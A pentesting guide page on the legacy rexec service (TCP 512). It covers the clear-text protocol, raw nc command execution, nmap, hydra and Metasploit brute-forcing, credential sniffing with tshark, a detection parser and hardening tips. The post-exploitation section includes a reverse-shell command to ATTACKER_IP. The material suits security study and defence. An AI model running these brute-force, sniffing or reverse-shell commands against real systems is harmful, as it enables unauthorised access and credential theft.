# 512 - Pentesting Rexec

{{#include ../banners/hacktricks-training.md}}

## Basic Information

Rexec (remote **exec**) is one of the original Berkeley *r*-services (together with `rlogin`, `rsh`, …). It provides **remote command execution** that is **authenticated only with a clear-text username and password**. The protocol dates from the early 1980s (see RFC 1060) and is nowadays considered **insecure by design**. Nevertheless, it is still enabled by default on some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.

**Default Port:** TCP 512 (`exec`)

```
PORT    STATE SERVICE
512/tcp open  exec
```

> 🔥 All traffic, including credentials, is transmitted **unencrypted**. Anyone able to sniff the network can recover the username, password and command.

### Protocol quick-look

1. The client connects to TCP 512.
2. The client sends three **NUL-terminated** strings:
   * the port number (as ASCII) on which it wishes to receive stdout/stderr (often `0`),
   * the **username**,
   * the **password**.
3. A final NUL-terminated string carrying the **command** to execute is sent.
4. The server replies with a single 8-bit status byte (`0` = success, `1` = failure) followed by the command output.

That means the exchange can be reproduced with nothing more than `echo -ne` and `nc`:

```bash
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target-ip> 512
```

If the credentials are valid, the output of `id` comes straight back on the same connection.

### Manual usage with the client

Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package:

```bash
rexec -l user -p password <target-ip> "uname -a"
```

If `-p` is omitted the client prompts interactively for the password (it still crosses the wire in clear-text!).
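The request and reply formats from the protocol quick-look above, parsed from captured TCP 512 payloads the way a monitoring pipeline would. This is an added example, not code from the original page; the sample payloads are constructed, and the password is reduced to its length so the resulting record can be shipped to a SIEM without re-logging the secret.

```python
# Added example (not from the original page): parse captured rexec traffic on
# TCP 512 into a loggable record. Wire format as described above:
#   client -> server: "<port>\0<username>\0<password>\0<command>\0" [stdin ...]
#   server -> client: one status byte (0 = success, 1 = failure), then output
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass
class RexecRequest:
    stderr_port: int    # 0 = client wants no separate stderr connection
    username: str
    password_len: int   # only the length is kept; the secret is never logged
    command: str


def parse_rexec_request(payload: bytes) -> Optional[RexecRequest]:
    """Return the parsed request, or None while the four fields are incomplete."""
    parts = payload.split(b"\x00", 4)       # bytes after the 4th NUL are stdin
    if len(parts) < 5:
        return None                         # truncated capture / still arriving
    port_field, user, password, command, _stdin = parts
    if not port_field.isdigit() or int(port_field) > 65535:
        return None                         # not a well-formed rexec request
    return RexecRequest(int(port_field), user.decode("latin-1"),
                        len(password), command.decode("latin-1"))


def parse_rexec_reply(payload: bytes) -> Optional[Tuple[bool, bytes]]:
    """Return (login_succeeded, output) from the server's reply, or None if empty."""
    if not payload:
        return None
    return payload[0] == 0, payload[1:]


def alert_line(src: str, dst: str, req: RexecRequest, reply: bytes = b"") -> str:
    """One-line SIEM-style summary; never includes the clear-text password."""
    status = parse_rexec_reply(reply)
    outcome = "pending" if status is None else ("success" if status[0] else "failure")
    line = (f"rexec {src}->{dst} user={req.username!r} pwlen={req.password_len} "
            f"cmd={req.command!r} auth={outcome}")
    if req.stderr_port:
        # Non-zero port: rexecd will connect back to the client on it.
        line += f" stderr_callback_port={req.stderr_port}"
    return line


# Constructed sample: the exchange from the nc one-liner above (SAMPLE_* are made up).
SAMPLE_REQUEST = b"0\x00user\x00password\x00id\x00"
SAMPLE_REPLY = b"\x00uid=1000(user) gid=1000(user)\n"
```

Feed it the reassembled client and server streams of a port-512 session (for example from the tshark output further down) and log the returned line; a non-zero callback port or a burst of `auth=failure` lines is what a brute-force attempt looks like.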
---

## Enumeration & Brute-forcing

### [**Brute-force**](../generic-hacking/brute-force.md#rexec)

### Nmap

```bash
nmap -p 512 --script rexec-info <target-ip>   # Discover service banner and test for stdout port mis-configuration
nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target-ip>
```

The `rexec-brute` NSE script uses the protocol described above to try credentials very quickly.

### Hydra / Medusa / Ncrack

```bash
hydra -L users.txt -P passwords.txt rexec://<target-ip> -s 512 -t 8
```

`hydra` has a dedicated **rexec** module and remains the fastest brute-forcer. `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way.

### Metasploit

```
use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target-ip>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```

The module spawns a shell on success and stores the credentials in the database.

---

## Sniffing credentials

Because everything is clear-text, **network captures are priceless**. With a copy of the traffic you can extract credentials without touching the target:

```bash
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
  awk -F"\\0" '{print $2":"$3" -> "$4}'   # username:password -> command
```

(In Wireshark, enable *Decode As…* TCP 512 → REXEC to view the parsed fields.)

---

## Post-Exploitation tips

* Commands run with the privileges of the supplied user. If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible.
* Rexec ignores the user's shell and executes the command via `/bin/sh -c <command>`. You can therefore use typical shell-escape tricks (`;`, `$( )`, backticks) to chain multiple commands or spawn reverse shells:

  ```bash
  rexec -l user -p pass <target-ip> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
  ```

* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement.

---

## Hardening / Detection

* **Do not expose rexec**; replace it with SSH. Virtually all modern *inetd* superservers ship with the service commented out by default.
* If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords.
* Monitor for traffic to port 512 and for `rexecd` process launches. A single packet capture is enough to detect a compromise.
* Disable `rexec`, `rlogin` and `rsh` together; they share most of the same codebase and weaknesses.

---

## References

* Nmap NSE `rexec-brute` documentation: [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
* Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login`: [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)

{{#include ../banners/hacktricks-training.md}}